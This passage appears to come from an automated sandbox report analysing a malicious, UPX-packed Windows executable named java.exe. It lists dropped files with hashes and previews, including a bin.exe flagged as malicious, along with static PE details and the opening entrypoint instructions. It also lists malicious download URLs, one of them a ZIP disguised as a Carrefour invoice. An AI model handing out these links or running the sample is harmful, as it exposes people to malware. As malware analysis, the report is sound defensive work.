                                                                                                                                                                                        https://pps.foundation/johnam3Than-d5dudlQ3Eyl-Qhorwam3Th-d58Kvo-d5uk&token=o1j24x8yqbCigYycIC6ni4B7VDe7Hz17hJNfy5f8gT3%2F1GKAFN45f%2BlZyQqB2Xd7&TOPIC_ID=119517Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 173.222.162.32
                                                                                                                                                                                        https://cld.pt/dl/download/c89835ff-781b-4959-be5a-67275492638b/CarrefourFacturaNOPAGO_REF19122023-A4-SIMPLEX-A9-TLLTK_FECHA20122023.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 173.222.162.32

                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                        No context

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):131840
                                                                                                                                                                                        Entropy (8bit):5.537536286594621
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:noA2EC/DdOb611qUFDjoA2QU/DWJb61PCUFe/oA2OA/DuFb614LUFqh:pxUFtlUF09UFa
                                                                                                                                                                                        MD5:9204821775860F2916C5345A284D1804
                                                                                                                                                                                        SHA1:A16FE7F54548F1E18B510871B4D049E9306220C3
                                                                                                                                                                                        SHA-256:AA98FD516AE3C31A189685AB146EB2CF657492FF4B3CA4DAB7CFE11352E6FF41
                                                                                                                                                                                        SHA-512:E518A6AB98ADCFA6E2F322942E1D46493827747BECF8F37D3C057A6C1F5DA010035AF7B8C43F1FBABD12275DF98D1777F9DC7A5E092E60BC1F019DBF11BBF57F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:........m...e.e.h#.."...3..........a.B...........v.............................................................................w.5.......^.......G.(.......>..............................................................................IA.,!Y...T...U..%.(P..x_exe_pathc:\users\user\desktop\officesetup.exeeC...@.,....4l..z..==Jy.;..hosteC..I?.,!Y..4l..z..==Jy.;..x_exe_pathc:\users\user\desktop\officesetup.exeeC...>.,......$s.A\.8|.vP.hosteC..<=.,.A....$s.A\.8|.vP.packageidmicrosoft.windows.explorereC..@<.,'A....$s.A\.8|.vP.windows_win32microsoft.windows.explorereC...;.,...C...?O..}-j:..hoste%<N<:.,.A.C...?O..}-j:..packageidmicrosoft.windows.explorere%<N@9.,'A.C...?O..}-j:..windows_win32microsoft.windows.explorere%<N.8.,.....g.,..... z..S;Z.lZv.N!hoste.~.B.f.,!K... z..S;Z.lZv.N!x_exe_pathc:\users\user\desktop\java.exee.~....C,....xX.%....^...._.hosteD.$....,..#..xX.%....^...._.packageid{6d809377-6af0-444b-8957-a3773f02200e}\adobe\acrobat dc\acrobat\acrobat.exeeD.$....,'.#..xX

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                        Entropy (8bit):3.174857563182266
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6:kKIlAN+SkQlPlEGYRMY9z+s3Ql2DUevat:ARkPlE99SCQl2DUevat
                                                                                                                                                                                        MD5:1F74494626BCB6B011CE0D4552A81914
                                                                                                                                                                                        SHA1:2B65A0CE57F353D8C7002272476D92AF5561A9AE
                                                                                                                                                                                        SHA-256:DA469E4D3012F1FA171BA1E0FCF595F58F433B66CCFF07B68E3C5EF3088C1E30
                                                                                                                                                                                        SHA-512:30BE11CE26F46656AD825598A76CF27C447D106759D223B0D28D87212DDB96C4B44A7D44B1F7B874A023D736B2D799FF7A4DF9BA4D6FED8647DEAFBE0A2A8130
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:p...... ........XB...5..(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\XIYR6UZ0\www.bing[1].xml

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (45174), with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):45182
                                                                                                                                                                                        Entropy (8bit):5.035881903277035
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:LMZG7xRKm1A1a/Qh/qLPvkc1mYyPdT9SWrRW:LLcrW
                                                                                                                                                                                        MD5:4CA54DDB0103D06971129D7733DBFF61
                                                                                                                                                                                        SHA1:2FFEF257617FDF189C83C17331D1550656D7E0A0
                                                                                                                                                                                        SHA-256:794F7217D2DD4F15DBB0D8168084DED15E759F207B79F3127EB7FF79B5BA7CE6
                                                                                                                                                                                        SHA-512:809DC1F9D82BE83EE6727E0A187E50F72797494651E3DF66F831FF3EB5D604BAC60E3D003330C9AA9694BBC46C82016CF6B1A4F71998E4B5259DAE1085DC661B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<root><item name="eventLogQueue_Online" value="[]" ltime="2630288056" htime="31077663" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1696333692425" ltime="2102739245" htime="31061487" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="2102740428" htime="31061487" /><item name="mdsb-v" value="8" ltime="2823990064" htime="31061487" /><item name="DSBMomentsCacheKey" value="{&quot;cacheTime&quot;:1696333765585,&quot;response&quot;:{&quot;SchemaVersion&quot;:&quot;1.1&quot;,&quot;ContentCollection&quot;:[{&quot;Date&quot;:&quot;20231003&quot;,&quot;Name&quot;:&quot;IOTD: WhitsundaySwirl&quot;,&quot;Order&quot;:1,&quot;IsMainColumnInLeft&quot;:true,&quot;Data&quot;:[{&quot;CardType&quot;:&quot;Hero&quot;,&quot;UXOrder&quot;:1,&quot;Cards&quot;:[{&quot;Scenario&quot;:&quot;ImageOfTheDay&quot;,&quot;UXTemplateName&quot;:&quot;DescriptiveHoverCard&quot;,&quot;FieldsStore&quot;:{&quot;Title&quot;:&quot;Whitehaven Beach, Whitsunday Island, Queen

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cadb2414-ac3a-4eb8-ac64-c5a60c670f90}\0.0.filtertrie.intermediate.txt

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):37421
                                                                                                                                                                                        Entropy (8bit):4.611252091103942
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:6UjQxwcuyEZDqRKmJHGHly84yeiEaFHm2iLOOXYcc2jZ:b6y5U5Jkb4yej+vUOOoujZ
                                                                                                                                                                                        MD5:9BDE56D9C4532F269928C5CE1FF2560D
                                                                                                                                                                                        SHA1:FB816F6AAF8B7FF7CBB0B521A9D30BAA52CDDB7F
                                                                                                                                                                                        SHA-256:89DE51E447ED49F7748B3D9C077B97703629575241D5BE61EAB5D4196C6CECAD
                                                                                                                                                                                        SHA-512:DFB9548743887463AB6161D0972E6BB501BF4576D0CDAF1A7C7EE1E427DF59361BBD128D034AB45B68C8E48CA645022E39C5507A439074B30489E25F390760FF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:0.0....~.....~.....~.....~.....~.....~...~.....~.....~.....~.......~......~.......~.....~.....~.....~.....~......~.....~......~......~.......~.....~......~.....~.......~.......~......~.....~......~.......~.....~......~.....~.....~......~......~.....~......~.....~.............~.......~...md~...alc~..zune~..zord~..znip~..zip help~..zip file manager~..yourphone~..your phone~..yhis pc~..y pc~..y computer~..xxbox~..xox~..xontrol panel~..xonreol~..xnox~..xnipping~..xms~..xmd~..xls:wux:xls~..xhrome~..xcontrol~..xcmd~..xchrome~..xcalc~..xbxox~..xbv~..xbpx~..xboz~..xbox~..xboxx~..xboxc~..xbos~..xbop~..xboox~..xboix~..xboc~..xbob~..xbix~..xbb~..xamera~..xalc~..x86)~..x64)~..x box~..wyc~..wxcwl~..wxcel~..wword~..wsord~..wsnip~..wrord~..wrod~..wrodpad~..wqord~..wprd~..wprdpad~..wpord~..wowrd~..wotrd~..wotd~..wo

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cadb2414-ac3a-4eb8-ac64-c5a60c670f90}\0.1.filtertrie.intermediate.txt

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5
                                                                                                                                                                                        Entropy (8bit):2.321928094887362
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Dy:W
                                                                                                                                                                                        MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
                                                                                                                                                                                        SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
                                                                                                                                                                                        SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
                                                                                                                                                                                        SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:0.1..

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cadb2414-ac3a-4eb8-ac64-c5a60c670f90}\0.2.filtertrie.intermediate.txt

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5
                                                                                                                                                                                        Entropy (8bit):2.321928094887362
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Ay:Ay
                                                                                                                                                                                        MD5:C204E9FAAF8565AD333828BEFF2D786E
                                                                                                                                                                                        SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                                                                                                                                                                                        SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                                                                                                                                                                                        SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:0.2..

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cadb2414-ac3a-4eb8-ac64-c5a60c670f90}\Apps.ft

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):50373
                                                                                                                                                                                        Entropy (8bit):3.7533011813000954
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:2crkq/9PYdKNAd1d0f41H1Ii0OyAAZXjLdk6nMUisfhteVoVPPP8qoEYhk5+6DC3:2ckq/1YdKNAd1d0f41H1Ii5yAAZXHdep
                                                                                                                                                                                        MD5:42C6CF763BC1DCEFD79C0E5262E7DFC4
                                                                                                                                                                                        SHA1:2EAA3A2B1557ED78CA1166EB007608137E52C343
                                                                                                                                                                                        SHA-256:99205F34B2E4960BE69575908CF5BC9C57A32A240105848EE998E1E79F240707
                                                                                                                                                                                        SHA-512:73B48317D927329B24F59C164CEA53D0A8AF6456F8CD8F93A285286696626E15B1E2BE286A39310D4772A6263D6AB43710A07392B501324732FADBF8F50DB487
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:................h...."cmd"~........A%..*aint~.........+r~........A,#A..A0..192~.........2016~........A3.A60A7.A[bAa,.b@..ck..d|(.e...f'..g*..h6..iq..j..AkG.l...m2..n~..o...p...q..Ar_.s...t>..u..Av.w...x...y..AzWB.RA..A.IC..UA......A.c..~........C.LA..C.(I..Cpre..run%~.........fetch%~.........ail~.........stsc~.........cmd~.........run~.........utlook~.........2-bit)~........Id.A ..~.........viewer~.........4-bit)~......... zip~........D-zip.Iz3A ..~........Ffile m..help~.........anager~.........fm~.........ip~........Aa..paint~.........int~.........omt~........CbouMAc.Ad.Ae..kype~........Al..mil~........An.Apa.rJ.As.At.Au..zure~.........t java~.........alc~........DcessS.ess~.........lc~.........md~.........on~.........robat~........G contro..s~.........~........Ol:wux:a.Occess c..ontrol~........Eapter%.b~........Ad"Cmin4Eobe a=Jva.F:wux:a..~.........dapter~........Fress b..~........Oook:wux.O:addres..s book~........E cmd:.Jis.Owux:adm..in cmd~........Otrative.. tools~........

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cadb2414-ac3a-4eb8-ac64-c5a60c670f90}\Apps.index

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):1126006
                                                                                                                                                                                        Entropy (8bit):6.147114410359821
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:AoLr7YfoyFxz8GfoLr7YfoyFxz8G21it:AMwf1xz8GfMwf1xz8G2
                                                                                                                                                                                        MD5:5665CA72FB1FE8FF993E1F56C8EDB387
                                                                                                                                                                                        SHA1:11C371B293397DEE3289435CC6F797110D5A631B
                                                                                                                                                                                        SHA-256:263D203F23A1E59D7FECA90148F7ED49333CD1CC607C58B4EEEDC1BF3A84F8C8
                                                                                                                                                                                        SHA-512:5601C99D230FC811D192E23B4537048A86200532CE5A402749FCF687BBC23DF2E52CC3E8597E79E94A4E7CCF8945C825EA2A7EB93DD9A1F2204F28501E7FDBA1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling.fE.h...K........~<~i..'..uT..r..7.c..l.s..P.x..c.k....p....'..CR*a..Qn...a.,[.o2..t.u}.,{f.m.Q..e ;.w.0..l..(.y..P......gy..d.:&.i.;.[..n.b....j.z#.@.E.Q!..Q......N.Q/...`.z.Qh.7.f..+.4.. . ....v..L.8..Q6#.Q\..Qq.B.;.}..0....9...A5...X.Qz.H.7.'..%. .Q3.8.....Q21/...M.Q.kQ-..."""""""jo..&.I.Q+.uQ1j...j.a:..Ab...;b...Q...'.<...#?< ..a_C..b]<3../.<...Ae..t!...u...Qb...n....y._.Qj.{Ql =.p.S..m)o..k...Qo..Qh..Q;7CQi1..w2..Qf.2Qd8h.r....sE...a.<..cZ... \...z."..,me<ume.Q.z5Qxx.av>.*Q[@R.24<u 24.ig...At.Qnv.Q .'Qo0xae....yo<uetoDam"...k<ue k.Qs.0ab..=&i<ue i+..j<ue jhQd..Qr..Qc.`&p<ue p...a<ue a.&w<ue w..&f<ue f..&h<ue h...v<ue v.Ql..&.<ube....g<ue g....<uetoet<uet..TUh<uet..&u<ueto..&p<ueto..%y<uet..cr<u...Re<...i<uetoMa<...-o<eto...o(...o(...ter*et...ute.eute..luetjuey...st* ta..s<unes%e<unew..n<ueenfj<u....men+e n...t<uetbs<..X%j<uej...2<ue2M%b<ueb[.%g<ueg...h<ueh.%v<uev1.%c<uec..%p<uep6.%f<uef..j<uo...ue

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133477548824988414.txt (copy)

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):114941
                                                                                                                                                                                        Entropy (8bit):5.179500563537803
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

                                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133477548824988414.txt.~tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):114941
                                                                                                                                                                                        Entropy (8bit):5.179500563537803
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

                                                                                                                                                                                        C:\Users\user\AppData\Roaming\F90F00A9\bin.exe

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):116224
                                                                                                                                                                                        Entropy (8bit):5.299415324250664
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:3iLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:3iyvRmDLs/ZrwWjjAqGcfzWH
                                                                                                                                                                                        MD5:EA8543BCC2E4689874647E2507DA6B29
                                                                                                                                                                                        SHA1:A98ACF8A9F445292FEDF5E353C8AB4106085190C
                                                                                                                                                                                        SHA-256:9CD73E36C637070F5143A84D05BCDCCEC788AF1D28E474B05E60D37D1F83076B
                                                                                                                                                                                        SHA-512:1508785EFC9F925BC0E34D189E74C045BB64809AC9E7E7A933DCED9BB2A3791B3C63871928811EBA6DC87542A8AFDA8B6357853C486D4CEF02E856A9CD330884
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L...@..T.............................Z............@.....................................................................................X...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@....imports............................@...........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                                                        Entropy (8bit):5.299488057565489
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                                                                                                        • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:java.exe
                                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                                        MD5:91493a9a9e83a7b48d178ae10f97028d
                                                                                                                                                                                        SHA1:7f774f01e7f3768de1802226fb6ab15242bea878
                                                                                                                                                                                        SHA256:79dc8da8c5f7b41a0eed67e10e5239355be1c6e089738138dfa3b753fe019355
                                                                                                                                                                                        SHA512:b9c3c7899a643dff3a2bcdfb1e30137cc60b9a004e03515748f6db97bdb8939cb0c69f444e2a7df8d6fb7cdc0f331ca70c19120b126dee5ca81e98efc575eb1e
                                                                                                                                                                                        SSDEEP:1536:1iLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:1iyvRmDLs/ZrwWjjAqGcfzWH
                                                                                                                                                                                        TLSH:A8B34B62F204E89BE817D8F29919CD3164A37DBC88A0455E32D97F6D58B3AD30859F0F
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L......T...........................

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:888c8e8eaa868fc6

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x405a80
                                                                                                                                                                                        Entrypoint Section:UPX0
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x549EEEEC [Sat Dec 27 17:39:56 2014 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:d39aa71a62356d5bd05b3ccf2dfedd9e

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push esi
                                                                                                                                                                                        sub esp, 38h
                                                                                                                                                                                        mov dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                        mov dword ptr [ebp-2Ch], 00000001h
                                                                                                                                                                                        mov ecx, dword ptr [ebp-2Ch]
                                                                                                                                                                                        mov dword ptr [ebp-20h], 00000000h
